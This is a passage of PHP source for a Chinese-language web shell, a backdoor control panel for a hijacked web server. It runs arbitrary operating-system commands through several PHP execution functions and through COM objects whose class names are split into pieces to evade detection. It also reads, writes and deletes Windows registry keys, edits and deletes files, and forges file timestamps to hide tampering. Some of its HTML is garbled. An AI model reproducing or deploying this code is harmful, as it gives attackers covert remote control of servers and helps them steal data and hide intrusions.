$fp = @fopen("".$dir."/".$localfile."","w");
echo $msg=@fwrite($fp,$code) ? "压缩保存".$dir."/".$localfile."本地成功!!" : "目录".$dir."无可写权限!";
@fclose($fp);
}
}
} else {
echo "请选择要打包下载的文件!";
}
}
// Shell.Application 运行程序
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
$shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
echo ($a=='0') ? "程序已经成功执行!" : "程序运行失败!";
}
// 查看PHP配置参数状况
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname'])."";
}
// 读取注册表
elseif(($regread) AND !empty($_POST['readregname'])) {
$shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
var_dump(@$shell->RegRead($_POST['readregname']));
}
// 写入注册表
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
$shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
echo ($a=='0') ? "写入注册表健值成功!" : "写入 ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." 失败!";
}
// 删除注册表
elseif(($regdelete) AND !empty($_POST['delregname'])) {
$shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
$a = @$shell->RegDelete($_POST['delregname']);
echo ($a=='0') ? "删除注册表健值成功!" : "删除 ".$_POST['delregname']." 失败!";
}
else {
echo "$notice";
echo "<a href="\" href="\""?dir=C:/Program%20Files/\">Program</a> | <a href="\" href="\""?dir=C:/Documents%20and%20Settings/All%20Users/Application%20Data/Symantec/pcAnywhere\">pcAnywhere</a> | <a href="\" href="\""?dir=C:/Documents%20and%20Settings/All%20Users/「开始」菜单/程序\">开始程序</a> | <a href="\" href="\""?dir=C:/Documents%20and%20Settings/All%20Users\">AllUsers</a> | <a href="\" href="\""?dir=C:/Program Files/RhinoSoft.com/Serv-U\">Serv-U</a> | ";
for ($i=66;$i<=90;$i++){$drive= chr($i).':';
if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$drive/\" href="\" href="\""?dir=$drive/\">$drive\\</a>";}
}
}
echo "</b></p>\n";
/*===================== 执行操作 结束 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
$tb->tableheader();
?>
<tr bgcolor="#cccccc">
<td align="center" nowrap width="27%"><b>文件</b></td>
<td align="center" nowrap width="16%"><b>创建日期</b></td>
<td align="center" nowrap width="16%"><b>最后修改</b></td>
<td align="center" nowrap width="11%"><b>大小</b></td>
<td align="center" nowrap width="6%"><b>属性</b></td>
<td align="center" nowrap width="24%"><b>操作</b></td>
</tr>
<FORM action="" method="POST">
<?php
// 目录列表
$dirs=@opendir($dir);
$dir_i = '0';
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="1"){
if($file!=".." && $file!=".") {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style="\" style="\""padding-left: 5px;\"><INPUT type=checkbox value=$file name=dl[]> [<a href="\" href="\""?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href="\" href="\""?action=search&dir=".$filepath."\">Search</a></td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href="\" href="\""?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
echo " <td align=\"center\" nowrap>| <a href="\" href="\""#\" onclick=\"really('".urlencode($dir)."','".urlencode($file)."','你确定要删除 $file 目录吗? \\n\\n如果该目录非空,此次操作将会删除该目录下的所有文件!','1')\">删除</a> | <a href="\" href="\""?action=rename&dir=".urlencode($dir)."&fname=".urlencode($file)."\">改名</a> |</td>\n";
echo "</tr>\n";
$dir_i++;
} else {
if($file=="..") {
echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"6\" style="\" style="\""padding-left: 5px;\"><a href="\" href="\""?dir=".urlencode($dir)."/".urlencode($file)."\">返回上级目录</a></td>\n";
echo "</tr>\n";
}
}
}
}// while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
<td colspan="6" height="5"></td>
</tr>
<?
// 文件列表
$dirs=@opendir($dir);
$file_i = '0';
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="0"){
$size=@filesize($filepath);
$size=$size/1024 ;
$size= @number_format($size, 3);
if (@filectime($filepath) == @filemtime($filepath)) {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
} else {
$ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
$mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
}
@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style="\" style="\""padding-left: 5px;\">";
echo "<INPUT type=checkbox value=$file name=dl[]>";
echo "<a href="\" href="\""$filepath\" target=\"_blank\">$file</a></td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href="\" href="\""?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
echo " <td align=\"center\" nowrap><a href="\" href="\""?downfile=".urlencode($filepath)."\">下载</a> | <a href="\" href="\""?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href="\" href="\""#\" onclick=\"really('".urlencode($dir)."','".urlencode($filepath)."','你确定要删除 $file 文件吗?','2')\">删除</a> | <a href="\" href="\""?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\">改名</a> | <a href="\" href="\""?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\">时间</a></td>\n";
echo "</tr>\n";
$file_i++;
}
}// while
@closedir($dirs);
if(get_cfg_var('safemode'))$z = "<a href="\" href="\""#\" title=\"使用说明\" onclick=\"alert('Php为安全模式尽量少打包内容以免脚本超时\\n\\n填写文件名则把文件保存在本地方便操作,不填则直接下载。')\">(?)</a>";
else $z = "<a href="\" href="\""#\" title=\"使用说明\" onclick=\"alert('Php运行非安全模式,打包大件请等啊等啊等啊等\\n\\n填写文件名则把文件保存在本地方便操作,不填则直接下载。')\">(?)</a>";
$tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' 本地文件:'.$tb->makeinput('localfile','','','text','15').''.$tb->makeinput('downrar','选中打包下载或本地保存','','submit').' '.$z.'</td><td align="right">'.$dir_i.' 个目录 / '.$file_i.' 个文件</td></tr></table>','center',getrowbg(),'','','6');
echo "</FORM>\n";
echo "</table>\n";
}// end dir
elseif ($_GET['action'] == "editfile") {
if(empty($newfile)) {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
$action = "?dir=".urlencode($dir)."&editfile=".$editfile;
$tb->tableheader();
$tb->formheader($action,'新建/编辑文件');
$tb->tdbody('当前文件: '.$tb->makeinput('editfilename',$filename).' 输入新文件名则建立新文件 Php代码加密: <input type="checkbox" name="change" value="yes" onclick="javascript:alert(\'这个功能只可以用来加密或是压缩完整的php代码。\\n\\n非php代码或不完整php代码或不支持gzinflate函数请不要使用!\')"> ');
$tb->tdbody($tb->maketextarea('filecontent',$contents));
$tb->makehidden('do','doeditfile');
$tb->formfooter('1','30');
}//end editfile
elseif ($_GET['action'] == "rename") {
$nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
$action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
$tb->tableheader();
$tb->formheader($action,'修改文件名');
$tb->makehidden('oldname',$dir."/".$nowfile);
$tb->makehidden('dir',$dir);
$tb->tdbody('当前文件名: '.basename($nowfile));
$tb->tdbody('改名为: '.$tb->makeinput('newname'));
$tb->makehidden('do','rename');
$tb->formfooter('1','30');
}//end rename
elseif ($_GET['action'] == "eval") {
$action = "?dir=".urlencode($dir)."";
$tb->tableheader();
$tb->formheader(''.$action.' "target="_blank' ,'执行php脚本');
$tb->tdbody($tb->maketextarea('phpcode',$contents));
$tb->formfooter('1','30');
}
elseif ($_GET['action'] == "fileperm") {
$action = "?dir=".urlencode($dir)."&file=".$file;
$tb->tableheader();
$tb->formheader($action,'修改文件属性');
$tb->tdbody('修改 '.$file.' 的属性为: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
$tb->makehidden('file',$file);
$tb->makehidden('dir',urlencode($dir));
$tb->makehidden('do','editfileperm');
$tb->formfooter('1','30');
}//end fileperm
elseif ($_GET['action'] == "newtime") {
$action = "?dir=".urlencode($dir);
$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
$tb->tableheader();
$tb->formheader($action,'克隆文件最后修改时间');
$tb->tdbody("修改文件: ".$tb->makeinput('curfile',$file,'readonly')." → 目标文件: ".$tb->makeinput('tarfile','需填完整路径及文件名'),'center','2','30');
$tb->makehidden('do','domodtime');
$tb->formfooter('','30');
$tb->formheader($action,'自定义文件最后修改时间');
$tb->tdbody('<br><ul><li>有效的时间戳典型范围是从格林威治时间 1901 年 12 月 13 日 星期五 20:45:54 到 2038年 1 月 19 日 星期二 03:14:07<br>(该日期根据 32 位有符号整数的最小值和最大值而来)</li><li>说明: 日取 01 到 30 之间, 时取 0 到 24 之间, 分和秒取 0 到 60 之间!</li></ul>','left');
$tb->tdbody('当前文件名: '.$file);
$tb->makehidden('curfile',$file);
$tb->tdbody('修改为: '.$tb->makeinput('year','1984','','text','4').' 年 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 月 '.$tb->makeinput('data','18','','text','2').' 日 '.$tb->makeinput('hour','20','','text','2').' 时 '.$tb->makeinput('minute','00','','text','2').' 分 '.$tb->makeinput('second','00','','text','2').' 秒','center','2','30');
$tb->makehidden('do','modmytime');
$tb->formfooter('1','30');
}//end newtime
elseif ($_GET['action'] == "shell") {
$action = "??action=shell&dir=".urlencode($dir);
$tb->tableheader();
$tb->tdheader('WebShell Mode');
if (substr(PHP_OS, 0, 3) == 'WIN') {
$program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/upload/tech/20091012/20091012020853_3c7781a36bcd6cf08c11a970fbe0e2a6.txt";
echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
$tb->tdbody('无回显运行程序 → 文件: '.$tb->makeinput('program',$program).' 参数: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35');
$tb->makehidden('do','programrun');
echo "</form>\n";
}
echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
if(isset($_POST['cmd'])) $cmd = $_POST['cmd'];
$tb->tdbody('提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容. ');
$tb->tdbody('proc_open函数假设不是默认的winnt系统请自行设置使用,自行修改记得写退出,否则会在主机上留下一个未结束的进程.');
$tb->tdbody('proc_open函数要使用的cmd程序的位置:'.$tb->makeinput('cmd',$cmd,'','text','30').'(要是是linux系统还是大大们自己修改吧)');
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open');
$tb->tdbody('选择执行函数: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 输入命令: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit'));
?>
<tr class="secondalt">
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
if (!empty($_POST['command'])) {
if ($execfunc=="system") {
system($_POST['command']);
} elseif ($execfunc=="passthru") {
passthru($_POST['command']);
} elseif ($execfunc=="exec") {
$result = exec($_POST['command']);
echo $result;
} elseif ($execfunc=="shell_exec") {
$result=shell_exec($_POST['command']);
echo $result;
} elseif ($execfunc=="popen") {
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
} elseif ($execfunc=="wscript") {
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
} elseif($execfunc=="proc_open"){
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open("".$_POST['cmd']."", $descriptorspec, $pipes);
if (is_resource($process)) {
// 写命令
fwrite($pipes[0], "".$_POST['command']."\r\n");
fwrite($pipes[0], "exit\r\n");
fclose($pipes[0]);
// 读取输出
while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
while (!feof($pipes[2])) {
echo fgets($pipes[2], 1024);
}
fclose($pipes[2]);
proc_close($process);
}
} else {
system($_POST['command']);
}
}
?>